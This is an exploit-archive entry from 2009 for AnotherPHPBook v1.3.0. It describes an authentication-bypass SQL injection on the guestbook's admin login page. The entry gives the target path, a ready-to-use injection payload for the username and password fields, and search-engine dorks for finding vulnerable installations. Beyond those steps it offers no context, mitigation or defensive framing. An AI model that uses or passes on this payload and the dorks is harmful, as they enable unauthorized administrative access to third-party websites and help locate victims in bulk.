AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability

2009-07-21T00:00:00
ID 1337DAY-ID-5524
Type zdt
Reporter n3w7u
Modified 2009-07-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
======================================================================


########################################################################

                APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

########################################################################
#                            AUTHOR: n3w7u
#
## Download: www.clanscripte.net/main.php?content=download&do=dl&dlid=81
#
## Dorks:                 inurl:apbook/index.php
#  or
#         AnotherPHPBook (APB) v.1.3.0 © 2001 by Stephan Baumeister (zap)
#########################################################################
#
## Exploit:
# 
#  http://[host]/[path]/admin/index.php
#
#    [!]
#           Put as username and password: 'or 1=1/*
#           You will log in as admin
#
#
#########################################################################



#  0day.today [2018-01-10]  #